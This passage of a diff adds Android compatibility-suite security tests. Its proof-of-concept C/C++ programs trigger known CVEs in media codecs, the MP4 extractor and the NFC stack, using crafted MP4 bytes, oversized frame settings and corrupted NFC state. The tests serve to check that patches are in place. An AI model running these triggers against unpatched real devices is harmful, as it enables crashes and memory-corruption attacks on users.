+ opj_free(stream);
+ return NULL;
+ }
+
+ stream->m_current_data = stream->m_stored_data;
+ stream->m_status |= OPJ_STREAM_STATUS_INPUT;
+ stream->m_opj_skip = opj_stream_read_skip;
+ stream->m_opj_seek = opj_stream_read_seek;
+ stream->m_read_fn = opj_stream_default_read;
+ stream->m_write_fn = opj_stream_default_write;
+ stream->m_skip_fn = opj_stream_default_skip;
+ stream->m_seek_fn = opj_stream_default_seek;
+
+ return (opj_stream_t *) stream;
+}
+
+static OPJ_SIZE_T ReadHandler(void *buffer, OPJ_SIZE_T length, void *context) {
+ applicationContext* appContext = (applicationContext*) context;
+ ssize_t count = 0;
+ ssize_t rem = 0;
+ if (!appContext) {
+ return ((OPJ_SIZE_T) - 1);
+ }
+ rem = appContext->blobSize - appContext->readPos;
+ if ((ssize_t) length <= rem) {
+ count = length;
+ } else {
+ count = rem;
+ }
+ memcpy(buffer, &appContext->blob[appContext->readPos], count);
+ appContext->readPos += count;
+ return ((OPJ_SIZE_T) length);
+}
+
+int main(void) {
+ ssize_t offset = 0;
+ unsigned int count = 0;
+ applicationContext sContext;
+ opj_j2k_t* codec = NULL;
+ opj_stream_t* stream = NULL;
+ opj_image_t* image = NULL;
+ opj_stream_private_t* private = NULL;
+ opj_event_mgr_t eventMgr;
+ stream = allocate_stream();
+ private = (opj_stream_private_t*)stream;
+
+ sContext.blobSize = gNumStartValues + REPEATVALUES * gNumRepeatValues
+ + gNumLastValues;
+ sContext.blob = (char*) opj_malloc(sContext.blobSize);
+ if (!sContext.blob) {
+ return EXIT_FAILURE;
+ }
+ memset(sContext.blob, 0, sContext.blobSize);
+
+ memcpy(&sContext.blob[offset], gStartValues, gNumStartValues);
+ offset += gNumStartValues;
+ for (count = 0; count < REPEATVALUES; ++count) {
+ memcpy(&sContext.blob[offset], gRepeatValues, gNumRepeatValues);
+ offset += gNumRepeatValues;
+ }
+ memcpy(&sContext.blob[offset], gLastValues, gNumLastValues);
+ offset += gNumLastValues;
+ sContext.readPos = 0;
+ private->m_read_fn = ReadHandler;
+ private->m_user_data = (void*)&sContext;
+ private->m_user_data_length = sContext.blobSize;
+ private->m_free_user_data_fn = NULL;
+ codec = opj_j2k_create_decompress();
+ opj_set_default_event_handler(&eventMgr);
+ opj_j2k_read_header(private,codec,&image,&eventMgr);
+ opj_free(sContext.blob);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp
new file mode 100644
index 0000000..ad70e63
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2017-0684",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_omxutils",
+ ],
+ shared_libs: [
+ "libstagefright",
+ "libbinder",
+ "libmedia_omx",
+ "libutils",
+ "liblog",
+ "libui",
+ "libstagefright_foundation",
+ "libcutils",
+ "libhidlbase",
+ "libhidlmemory",
+ "android.hidl.allocator@1.0",
+ "android.hardware.media.omx@1.0",
+ ],
+ include_dirs: [
+ "frameworks/native/include/media/openmax",
+ "frameworks/av/media/libstagefright",
+ "frameworks/native/include/media/hardware",
+ ],
+ compile_multilib: "32",
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp
new file mode 100644
index 0000000..9b76c7b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp
@@ -0,0 +1,139 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/omxUtils.h"
+
+sp<IAllocator> mAllocator = IAllocator::getService("ashmem");
+
+int allocateHidlPortBuffers(OMX_U32 portIndex,
+ Vector<Buffer> *buffers) {
+ buffers->clear();
+ OMX_PARAM_PORTDEFINITIONTYPE def;
+ int err = omxUtilsGetParameter(portIndex, &def);
+ omxExitOnError(err);
+ for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
+ Buffer buffer;
+ buffer.mFlags = 0;
+ bool success;
+ auto transStatus = mAllocator->allocate(def.nBufferSize,
+ [&success, &buffer](
+ bool s,
+ hidl_memory const& m) {
+ success = s;
+ buffer.mHidlMemory = m;
+ });
+ omxExitOnError(!transStatus.isOk());
+ omxExitOnError(!success);
+ omxUtilsUseBuffer(portIndex, buffer.mHidlMemory, &buffer.mID);
+ buffers->push(buffer);
+ }
+ return OK;
+}
+
+int main() {
+
+ /* Initialize OMX for the specified codec */
+ status_t ret = omxUtilsInit((char *) "OMX.google.h264.encoder");
+ omxExitOnError(ret);
+ /* Get OMX input port parameters */
+ OMX_PARAM_PORTDEFINITIONTYPE *params =
+ (OMX_PARAM_PORTDEFINITIONTYPE *) malloc(
+ sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+ int ipBufferCount = params->nBufferCountActual;
+ /* Set port mode */
+ omxUtilsSetPortMode(OMX_UTILS_IP_PORT, IOMX::kPortModeDynamicANWBuffer);
+ /* Allocate input buffers and graphic buffer */
+ sp<GraphicBuffer> graphicbuffer = new GraphicBuffer(
+ params->format.video.nFrameWidth, params->format.video.nFrameHeight,
+ HAL_PIXEL_FORMAT_RGBX_8888,
+ android::GraphicBuffer::USAGE_HW_VIDEO_ENCODER, "me");
+ int i;
+ Vector<Buffer> inputBuffers;
+ Vector<Buffer> outputBuffers;
+ /* Register input buffers with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers);
+ /* Get OMX output port parameters */
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_OP_PORT, params);
+ int opBufferSize = params->nBufferSize;
+ int opBufferCount = params->nBufferCountActual;
+ allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers);
+ /* Do OMX State chage to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State chage to Executing */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+ /* Empty input buffers and fill output buffers */
+ OMXBuffer omxIpBuf(graphicbuffer);
+ omxUtilsEmptyBuffer(inputBuffers[0].mID, omxIpBuf, 0, 0, -1);
+ OMXBuffer omxOpBuf(0, opBufferSize);
+ omxUtilsFillBuffer(outputBuffers[0].mID, omxOpBuf, -1);
+ /* Do OMX State chage to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State chage to Loaded */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+ /* Free input and output buffers */
+ for (i = 0; i < ipBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mID);
+ }
+ for (i = 0; i < opBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mID);
+ }
+ /*********************************************************************/
+ /* Following code exposes vulnerability */
+ /*********************************************************************/
+ Vector<Buffer> newInputBuffers;
+ Vector<Buffer> newOutputBuffers;
+ /* Get OMX input port parameters, change settings and set output port*/
+ /* port parameters */
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+ params->nBufferSize = 38016;
+ params->format.video.nFrameWidth = 2000;
+ params->format.video.nFrameHeight = 2000;
+ omxUtilsSetParameter(OMX_UTILS_IP_PORT, params);
+ /* Allocated input buffers and register with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &newInputBuffers);
+ /* Allocated output buffers and register with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &newOutputBuffers);
+ /* Do OMX State chage to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State chage to Executing */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+ /* Empty input buffers and fill output buffers */
+ OMXBuffer newOmxIpBuf(graphicbuffer);
+ omxUtilsEmptyBuffer(newInputBuffers[0].mID, newOmxIpBuf, 0, 0, -1);
+ OMXBuffer newOmxOpBuf(0, opBufferSize);
+ omxUtilsFillBuffer(newOutputBuffers[0].mID, newOmxOpBuf, -1);
+ /* Do OMX State change to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State change to Loaded */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+ /* Free input and output buffers */
+ for (i = 0; i < ipBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, newInputBuffers[i].mID);
+ }
+ for (i = 0; i < opBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, newOutputBuffers[i].mID);
+ }
+ /* Free OMX resources */
+ omxUtilsFreeNode();
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp
new file mode 100644
index 0000000..32959f2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2017-0726",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils_track",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include",
+ ],
+ shared_libs: [
+ "libdatasource",
+ "libstagefright",
+ "libstagefright_foundation",
+ "libutils",
+ "liblog",
+ ],
+ cflags: [
+ "-DCHECK_MEMORY_LEAK",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp
new file mode 100644
index 0000000..ea6935f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp
@@ -0,0 +1,143 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "stdlib.h"
+
+#include "../includes/memutils_track.h"
+#include <android/IMediaExtractor.h>
+#include <datasource/DataSourceFactory.h>
+#include <dlfcn.h>
+#include <media/DataSource.h>
+#include <media/IMediaHTTPService.h>
+#include <media/stagefright/DataSourceBase.h>
+#include <media/stagefright/MediaExtractor.h>
+#include <media/stagefright/MetaData.h>
+
+unsigned char mp4_data[] = {
+ 0x00, 0x00, 0x00, 0x1C, 0x66, 0x74, 0x79, 0x70, 0x6D, 0x70, 0x34, 0x32,
+ 0x00, 0x00, 0x00, 0x00, 0x6D, 0x70, 0x34, 0x32, 0x64, 0x62, 0x79, 0x31,
+ 0x69, 0x73, 0x6F, 0x6D, 0x00, 0x00, 0x00, 0x74, 0x6D, 0x6F, 0x6F, 0x76,
+ 0x00, 0x00, 0x00, 0x6C, 0x75, 0x64, 0x74, 0x61, 0x00, 0x00, 0x00, 0x64,
+ 0x6D, 0x65, 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x58,
+ 0x69, 0x6C, 0x73, 0x74, 0x00, 0x00, 0x00, 0x50, 0x2D, 0x2D, 0x2D, 0x2D,
+ 0x00, 0x00, 0x00, 0x1C, 0x6D, 0x65, 0x61, 0x6E, 0x00, 0x00, 0x00, 0x00,
+ 0x63, 0x6F, 0x6D, 0x2E, 0x61, 0x70, 0x70, 0x6C, 0x65, 0x2E, 0x69, 0x54,
+ 0x75, 0x6E, 0x65, 0x73, 0x00, 0x00, 0x00, 0x14, 0x6E, 0x61, 0x6D, 0x65,
+ 0x00, 0x00, 0x00, 0x00, 0x69, 0x54, 0x75, 0x6E, 0x53, 0x4D, 0x50, 0x42,
+ 0x00, 0x08, 0x00, 0x18, 0x64, 0x61, 0x74, 0x61, 0x33, 0x32, 0x20, 0x34,
+ 0x20, 0x33, 0x20, 0x32, 0x33, 0x32, 0x20, 0x34, 0x20, 0x33, 0x20, 0x32};
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmp4extractor.so"
+#define LIBNAME_APEX "/apex/com.android.media/lib/extractors/libmp4extractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmp4extractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmp4extractor.so"
+#endif
+
+#define TOTAL_SIZE 524432
+#define DATA_SIZE 144
+#define TRACK_SIZE (TOTAL_SIZE - DATA_SIZE + 16 + 1)
+#define TMP_FILE "/data/local/tmp/temp_cve_2017_0726"
+
+char enable_selective_overload = ENABLE_NONE;
+using namespace android;
+
+bool is_tracking_required(size_t size) { return (size == TRACK_SIZE); }
+
+int main() {
+ GetExtractorDef getDef = nullptr;
+ FILE *fp = fopen(TMP_FILE, "wb");
+ if (!fp) {
+ return EXIT_FAILURE;
+ }
+
+ char zero_array[TOTAL_SIZE - DATA_SIZE];
+ memset(zero_array, 0, (TOTAL_SIZE - DATA_SIZE) * sizeof(char));
+
+ /* Write mp4 stream */
+ fwrite(mp4_data, 1, DATA_SIZE, fp);
+
+ /* Append 0's to create custom PoC */
+ fwrite(zero_array, 1, (TOTAL_SIZE - DATA_SIZE), fp);
+ fclose(fp);
+
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+ }
+
+ getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource =
+ DataSourceFactory::getInstance()->CreateFromURI(NULL, TMP_FILE);
+ if (dataSource == nullptr) {
+ dlclose(libHandle);
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ void *creator = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+ float confidence;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ creator = (void *)getDef().u.v2.sniff(dataSource->wrap(), &confidence,
+ &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ creator = (void *)getDef().u.v3.sniff(dataSource->wrap(), &confidence,
+ &meta, &freeMeta);
+ }
+ if (!creator) {
+ dlclose(libHandle);
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+
+ CMediaExtractor *ret = ((CreatorFunc)creator)(dataSource->wrap(), meta);
+ if (ret == nullptr) {
+ dlclose(libHandle);
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+
+ if (meta != nullptr && freeMeta != nullptr) {
+ freeMeta(meta);
+ }
+
+ sp<MetaData> metaData = new MetaData();
+ MediaExtractorCUnwrapper *mediaExtractorCUnwrapper =
+ new MediaExtractorCUnwrapper(ret);
+ enable_selective_overload = ENABLE_MALLOC_CHECK;
+ mediaExtractorCUnwrapper->getTrackMetaData(*metaData.get(), 0, 1);
+ enable_selective_overload = ENABLE_NONE;
+
+ remove(TMP_FILE);
+ dlclose(libHandle);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
index 2139583..a3928d7 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
@@ -39,10 +39,6 @@
"android.hidl.allocator@1.0",
"android.hardware.media.omx@1.0",
],
- suffix: "32",
- },
- lib64: {
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp
new file mode 100644
index 0000000..9b478eb
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2017-13194",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ shared_libs: [
+ "liblog",
+ ],
+ include_dirs: [
+ "external/libvpx/libvpx",
+ "external/libvpx/libvpx/vpx_ports",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp
new file mode 100644
index 0000000..f11cac9
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp
@@ -0,0 +1,127 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dlfcn.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include "../includes/memutils.h"
+#include "vpx/vp8cx.h"
+#include "vpx/vpx_codec.h"
+#include "vpx/vpx_encoder.h"
+
+#define ENCODE_WIDTH 11
+#define ENCODE_HEIGHT 10000
+#define LIBNAME "/system/apex/com.android.media.swcodec/lib64/libvpx.so"
+#define LIBNAME_APEX "/apex/com.android.media.swcodec/lib64/libvpx.so"
+
+char enable_selective_overload = ENABLE_NONE;
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+ vpx_codec_err_t codec_return = VPX_CODEC_OK;
+ vpx_codec_enc_cfg_t mCodecConfiguration;
+ vpx_image_t raw_frame;
+ uint32_t framerate = (30 << 16);
+ vpx_codec_iface_t *(*func_ptr1)() =
+ (vpx_codec_iface_t * (*)()) dlsym(libHandle, "vpx_codec_vp8_cx");
+ if (!func_ptr1) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ vpx_codec_iface_t *mCodecInterface = (*func_ptr1)();
+ if (!mCodecInterface) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ vpx_codec_err_t (*func_ptr2)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int) =
+ (vpx_codec_err_t(*)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int))dlsym(
+ libHandle, "vpx_codec_enc_config_default");
+ if (!func_ptr2) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ codec_return = (*func_ptr2)(mCodecInterface, &mCodecConfiguration, 0);
+ mCodecConfiguration.g_w = ENCODE_WIDTH;
+ mCodecConfiguration.g_h = ENCODE_HEIGHT;
+ vpx_codec_ctx_t mCodecContext;
+ vpx_codec_err_t (*func_ptr3)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *,
+ vpx_codec_flags_t, int) =
+ (vpx_codec_err_t(*)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *,
+ vpx_codec_flags_t, int))dlsym(libHandle, "vpx_codec_enc_init_ver");
+ if (!func_ptr3) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ codec_return = (*func_ptr3)(&mCodecContext, mCodecInterface, &mCodecConfiguration, 0,
+ VPX_ENCODER_ABI_VERSION);
+
+ if (codec_return != VPX_CODEC_OK) {
+ return EXIT_FAILURE;
+ }
+ unsigned char *source = (unsigned char *)memalign(16, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2));
+ if (!source) {
+ return EXIT_FAILURE;
+ }
+ memset(source, 0, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2));
+ vpx_image_t (*func_ptr4)(vpx_image_t *, vpx_img_fmt_t, unsigned int, unsigned int, unsigned int,
+ unsigned char *) =
+ (vpx_image(*)(vpx_image *, vpx_img_fmt, unsigned int, unsigned int, unsigned int,
+ unsigned char *))dlsym(libHandle, "vpx_img_wrap");
+ if (!func_ptr4) {
+ dlclose(libHandle);
+ free(source);
+ return EXIT_FAILURE;
+ }
+ (*func_ptr4)(&raw_frame, VPX_IMG_FMT_I420, ENCODE_WIDTH, ENCODE_HEIGHT, 1, source);
+ vpx_codec_err_t (*func_ptr5)(vpx_codec_ctx_t *, const vpx_image_t *, vpx_codec_pts_t,
+ unsigned long, vpx_enc_frame_flags_t, unsigned long) =
+ (vpx_codec_err_t(*)(vpx_codec_ctx *, const vpx_image *, long, unsigned long, long,
+ unsigned long))dlsym(libHandle, "vpx_codec_encode");
+ if (!func_ptr5) {
+ dlclose(libHandle);
+ free(source);
+ return EXIT_FAILURE;
+ }
+ codec_return =
+ (*func_ptr5)(&mCodecContext, &raw_frame, framerate,
+ (uint32_t)(((uint64_t)1000000 << 16) / framerate), 0, VPX_DL_REALTIME);
+ if (codec_return != VPX_CODEC_OK) {
+ free(source);
+ return EXIT_FAILURE;
+ }
+ vpx_codec_err_t (*func_ptr6)(vpx_codec_ctx_t *) =
+ (vpx_codec_err_t(*)(vpx_codec_ctx *))dlsym(libHandle, "vpx_codec_destroy");
+ if (!func_ptr6) {
+ dlclose(libHandle);
+ free(source);
+ return EXIT_FAILURE;
+ }
+ (*func_ptr6)(&mCodecContext);
+ enable_selective_overload = ENABLE_NONE;
+ dlclose(libHandle);
+ free(source);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp
new file mode 100644
index 0000000..ac45cc9
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9558",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ include_dirs: [
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/gki/ulinux",
+ "system/nfc/src/include",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp
new file mode 100644
index 0000000..e20c0f2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include <stdlib.h>
+
+#include <nfc_api.h>
+#include <rw_int.h>
+
+#define INITIAL_VALUE 0xBE
+#define NUM_BYTES 1
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void rw_t2t_handle_rsp(uint8_t *p_data);
+
+void poc_cback(tRW_EVENT event, tRW_DATA *p_rw_data) {
+ (void)event;
+ (void)p_rw_data;
+}
+
+int main() {
+ tRW_T2T_CB *p_t2t = &rw_cb.tcb.t2t;
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+ p_t2t->state = RW_T2T_STATE_DETECT_TLV;
+ p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
+ p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
+ p_t2t->found_tlv = TAG_LOCK_CTRL_TLV;
+ p_t2t->bytes_count = NUM_BYTES;
+ p_t2t->tlv_value[1] = UINT8_MAX;
+ uint8_t *base_ptr = (uint8_t *)(p_t2t->lockbyte + RW_T1T_MAX_LOCK_BYTES);
+ memset((void *)base_ptr, INITIAL_VALUE, sizeof(tRW_T1T_LOCK));
+ uint8_t data[T2T_READ_DATA_LEN];
+ rw_t2t_handle_rsp(data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp
new file mode 100644
index 0000000..86b23dc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9561",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ ],
